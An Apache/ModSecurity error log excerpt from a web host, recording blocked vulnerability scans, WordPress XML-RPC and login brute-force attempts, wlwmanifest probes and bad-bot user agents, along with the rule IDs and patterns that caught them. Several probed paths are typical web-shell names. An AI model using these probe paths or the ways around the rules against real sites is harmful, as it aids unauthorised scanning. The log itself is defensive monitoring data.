[Tue May 26 14:01:12.841434 2026] [security2:error] [pid 578581:tid 578717] [client 20.206.111.238:14065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.stockmarketanalysis.in"] [uri "/wp-info.php"] [unique_id "ahVaUJm_8al1sb-umPtijAAAAAY"]
[Tue May 26 14:01:12.841530 2026] [security2:error] [pid 578581:tid 578717] [client 20.206.111.238:14065] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.stockmarketanalysis.in"] [uri "/wp-info.php"] [unique_id "ahVaUJm_8al1sb-umPtijAAAAAY"]
[Tue May 26 14:01:12.982514 2026] [security2:error] [pid 578581:tid 578751] [client 202.141.30.10:35406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaUJm_8al1sb-umPtijQAAACg"]
[Tue May 26 14:01:12.982771 2026] [security2:error] [pid 578581:tid 578751] [client 202.141.30.10:35406] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaUJm_8al1sb-umPtijQAAACg"]
[Tue May 26 14:01:13.240904 2026] [security2:error] [pid 578581:tid 578807] [client 20.206.111.238:14095] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.stockmarketanalysis.in"] [uri "/wp-test.php"] [unique_id "ahVaUZm_8al1sb-umPtilQAAAGA"]
[Tue May 26 14:01:13.241039 2026] [security2:error] [pid 578581:tid 578807] [client 20.206.111.238:14095] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.stockmarketanalysis.in"] [uri "/wp-test.php"] [unique_id "ahVaUZm_8al1sb-umPtilQAAAGA"]
[Tue May 26 14:01:13.617704 2026] [security2:error] [pid 578581:tid 578825] [client 20.206.111.238:14087] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.stockmarketanalysis.in"] [uri "/asd67.php"] [unique_id "ahVaUZm_8al1sb-umPtioQAAAHI"]
[Tue May 26 14:01:13.617814 2026] [security2:error] [pid 578581:tid 578825] [client 20.206.111.238:14087] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.stockmarketanalysis.in"] [uri "/asd67.php"] [unique_id "ahVaUZm_8al1sb-umPtioQAAAHI"]
[Tue May 26 14:01:13.643688 2026] [security2:error] [pid 578581:tid 578775] [client 216.244.66.241:53800] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/jp/academics/department/index.html"] [unique_id "ahVaUZm_8al1sb-umPtipQAAAEA"]
[Tue May 26 14:01:13.643806 2026] [security2:error] [pid 578581:tid 578775] [client 216.244.66.241:53800] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/jp/academics/department/index.html"] [unique_id "ahVaUZm_8al1sb-umPtipQAAAEA"]
[Tue May 26 14:01:14.064673 2026] [security2:error] [pid 578581:tid 578738] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaUZm_8al1sb-umPtipAAAABs"]
[Tue May 26 14:01:14.990439 2026] [security2:error] [pid 578581:tid 578817] [client 20.48.248.215:25728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVaUpm_8al1sb-umPti0QAAAGo"]
[Tue May 26 14:01:14.990557 2026] [security2:error] [pid 578581:tid 578817] [client 20.48.248.215:25728] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVaUpm_8al1sb-umPti0QAAAGo"]
[Tue May 26 14:01:16.375562 2026] [security2:error] [pid 578581:tid 578742] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaU5m_8al1sb-umPti5AAAAB8"]
[Tue May 26 14:01:16.771493 2026] [security2:error] [pid 578581:tid 578765] [client 129.222.147.134:7565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaVJm_8al1sb-umPti_wAAADY"]
[Tue May 26 14:01:16.773798 2026] [security2:error] [pid 578581:tid 578765] [client 129.222.147.134:7565] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaVJm_8al1sb-umPti_wAAADY"]
[Tue May 26 14:01:18.325184 2026] [security2:error] [pid 578581:tid 578726] [client 156.245.205.68:56348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.205.245.156.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.haddingtonwines.com"] [uri "/e/install/index.php"] [unique_id "ahVaVpm_8al1sb-umPtjNgAAAA8"]
[Tue May 26 14:01:18.811779 2026] [security2:error] [pid 578581:tid 578748] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaVpm_8al1sb-umPtjPgAAACU"]
[Tue May 26 14:01:20.118593 2026] [security2:error] [pid 578581:tid 578745] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaV5m_8al1sb-umPtjXgAAACI"]
[Tue May 26 14:01:20.840477 2026] [security2:error] [pid 578581:tid 578719] [client 216.244.66.241:46914] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/jp/campuslife/schedule/calendar.html"] [unique_id "ahVaWJm_8al1sb-umPtjdwAAAAg"]
[Tue May 26 14:01:20.840650 2026] [security2:error] [pid 578581:tid 578719] [client 216.244.66.241:46914] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/jp/campuslife/schedule/calendar.html"] [unique_id "ahVaWJm_8al1sb-umPtjdwAAAAg"]
[Tue May 26 14:01:21.919807 2026] [security2:error] [pid 578581:tid 578760] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaWZm_8al1sb-umPtjiQAAADE"]
[Tue May 26 14:01:23.352374 2026] [security2:error] [pid 578581:tid 578796] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaWpm_8al1sb-umPtjpgAAAFU"]
[Tue May 26 14:01:23.847510 2026] [security2:error] [pid 578581:tid 578731] [client 202.141.30.10:65530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaW5m_8al1sb-umPtjugAAABQ"]
[Tue May 26 14:01:23.847654 2026] [security2:error] [pid 578581:tid 578731] [client 202.141.30.10:65530] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaW5m_8al1sb-umPtjugAAABQ"]
[Tue May 26 14:01:26.144803 2026] [security2:error] [pid 578581:tid 578770] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaXZm_8al1sb-umPtj6gAAADs"]
[Tue May 26 14:01:26.873165 2026] [security2:error] [pid 578581:tid 578769] [client 4.193.189.92:6596] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "kexcouriers.com"] [uri "/1.php"] [unique_id "ahVaXpm_8al1sb-umPtkCgAAADo"]
[Tue May 26 14:01:26.936120 2026] [security2:error] [pid 578581:tid 578769] [client 4.193.189.92:6596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/1.php"] [unique_id "ahVaXpm_8al1sb-umPtkCgAAADo"]
[Tue May 26 14:01:27.000246 2026] [security2:error] [pid 578581:tid 578831] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaXpm_8al1sb-umPtkBAAAAHg"]
[Tue May 26 14:01:27.172058 2026] [security2:error] [pid 578581:tid 578803] [client 129.222.147.134:5942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaX5m_8al1sb-umPtkDQAAAFw"]
[Tue May 26 14:01:27.172166 2026] [security2:error] [pid 578581:tid 578803] [client 129.222.147.134:5942] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaX5m_8al1sb-umPtkDQAAAFw"]
[Tue May 26 14:01:27.650855 2026] [security2:error] [pid 578581:tid 578787] [client 4.193.189.92:1454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/2.php"] [unique_id "ahVaX5m_8al1sb-umPtkJwAAAEw"]
[Tue May 26 14:01:28.034877 2026] [core:error] [pid 578581:tid 578825] [client 34.75.119.88:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:01:28.034903 2026] [core:error] [pid 578581:tid 578825] [client 34.75.119.88:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:01:28.208608 2026] [core:error] [pid 578581:tid 578722] [client 34.75.119.88:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:01:28.208640 2026] [core:error] [pid 578581:tid 578722] [client 34.75.119.88:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:01:28.461767 2026] [security2:error] [pid 578581:tid 578809] [client 4.193.189.92:6561] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/7.php"] [unique_id "ahVaYJm_8al1sb-umPtkRQAAAGI"]
[Tue May 26 14:01:28.483816 2026] [security2:error] [pid 578581:tid 578717] [client 34.75.119.88:59981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.119.75.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rakeshdewan.com"] [uri "/xmlrpc.php"] [unique_id "ahVaYJm_8al1sb-umPtkQQAAAAY"]
[Tue May 26 14:01:28.643283 2026] [security2:error] [pid 578581:tid 578750] [client 34.75.119.88:57865] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rakeshdewan.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVaYJm_8al1sb-umPtkTAAAACc"]
[Tue May 26 14:01:28.798824 2026] [security2:error] [pid 578581:tid 578745] [client 34.75.119.88:62510] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rakeshdewan.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVaYJm_8al1sb-umPtkUAAAACI"]
[Tue May 26 14:01:28.964303 2026] [security2:error] [pid 578581:tid 578806] [client 34.75.119.88:50245] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rakeshdewan.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVaYJm_8al1sb-umPtkVgAAAF8"]
[Tue May 26 14:01:29.132752 2026] [security2:error] [pid 578581:tid 578728] [client 34.75.119.88:65216] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rakeshdewan.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVaYZm_8al1sb-umPtkXQAAABE"]
[Tue May 26 14:01:29.222507 2026] [security2:error] [pid 578581:tid 578773] [client 4.193.189.92:6507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/10.php"] [unique_id "ahVaYZm_8al1sb-umPtkXwAAAD4"]
[Tue May 26 14:01:29.257470 2026] [security2:error] [pid 578581:tid 578826] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaYJm_8al1sb-umPtkUwAAAHM"]
[Tue May 26 14:01:29.337134 2026] [security2:error] [pid 578581:tid 578787] [client 34.75.119.88:55997] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rakeshdewan.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVaYZm_8al1sb-umPtkYgAAAEw"]
[Tue May 26 14:01:29.529812 2026] [security2:error] [pid 578581:tid 578784] [client 34.75.119.88:61345] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rakeshdewan.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVaYZm_8al1sb-umPtkZwAAAEk"]
[Tue May 26 14:01:29.695023 2026] [security2:error] [pid 578581:tid 578731] [client 34.75.119.88:51143] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rakeshdewan.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVaYZm_8al1sb-umPtkaAAAABQ"]
[Tue May 26 14:01:29.860134 2026] [security2:error] [pid 578581:tid 578820] [client 34.75.119.88:58130] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rakeshdewan.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVaYZm_8al1sb-umPtkbAAAAG0"]
[Tue May 26 14:01:30.039619 2026] [security2:error] [pid 578581:tid 578766] [client 4.193.189.92:6520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/13.php"] [unique_id "ahVaYpm_8al1sb-umPtkcwAAADc"]
[Tue May 26 14:01:30.828672 2026] [security2:error] [pid 578581:tid 578714] [client 4.193.189.92:6459] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/100.php"] [unique_id "ahVaYpm_8al1sb-umPtkkwAAAAM"]
[Tue May 26 14:01:31.143190 2026] [security2:error] [pid 578581:tid 578713] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaYpm_8al1sb-umPtkjQAAAAI"]
[Tue May 26 14:01:31.595195 2026] [security2:error] [pid 578581:tid 578731] [client 4.193.189.92:6565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/222.php"] [unique_id "ahVaY5m_8al1sb-umPtkpwAAABQ"]
[Tue May 26 14:01:31.823851 2026] [security2:error] [pid 578581:tid 578789] [client 106.192.248.115:65417] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVaY5m_8al1sb-umPtkqwAAAE4"]
[Tue May 26 14:01:31.823958 2026] [security2:error] [pid 578581:tid 578789] [client 106.192.248.115:65417] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVaY5m_8al1sb-umPtkqwAAAE4"]
[Tue May 26 14:01:32.027257 2026] [security2:error] [pid 578581:tid 578718] [client 123.26.203.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaY5m_8al1sb-umPtkqgAAAAc"]
[Tue May 26 14:01:32.373261 2026] [security2:error] [pid 578581:tid 578830] [client 4.193.189.92:6629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/adminfuns.php"] [unique_id "ahVaZJm_8al1sb-umPtkxQAAAHc"]
[Tue May 26 14:01:33.084281 2026] [security2:error] [pid 578581:tid 578782] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaZJm_8al1sb-umPtk0gAAAEc"]
[Tue May 26 14:01:33.109677 2026] [security2:error] [pid 578581:tid 578799] [client 4.193.189.92:6471] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/abcd.php"] [unique_id "ahVaZZm_8al1sb-umPtk4gAAAFg"]
[Tue May 26 14:01:33.851339 2026] [security2:error] [pid 578581:tid 578722] [client 4.193.189.92:6513] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/al.php"] [unique_id "ahVaZZm_8al1sb-umPtk9AAAAAs"]
[Tue May 26 14:01:33.995785 2026] [security2:error] [pid 578581:tid 578652] [remote 111.229.141.137:46920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVaZZm_8al1sb-umPtk9QAADEY"]
[Tue May 26 14:01:34.638529 2026] [security2:error] [pid 578581:tid 578788] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaZpm_8al1sb-umPtlAQAAAE0"]
[Tue May 26 14:01:34.641263 2026] [security2:error] [pid 578581:tid 578833] [client 4.193.189.92:6414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/alfa.php"] [unique_id "ahVaZpm_8al1sb-umPtlDwAAAHo"]
[Tue May 26 14:01:34.907165 2026] [security2:error] [pid 578581:tid 578740] [client 202.141.30.10:35496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaZpm_8al1sb-umPtlFgAAAB0"]
[Tue May 26 14:01:34.907332 2026] [security2:error] [pid 578581:tid 578740] [client 202.141.30.10:35496] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaZpm_8al1sb-umPtlFgAAAB0"]
[Tue May 26 14:01:35.319072 2026] [security2:error] [pid 578581:tid 578663] [remote 69.171.234.22:37906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.234.171.69.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVaZ5m_8al1sb-umPtlIwAAZFE"]
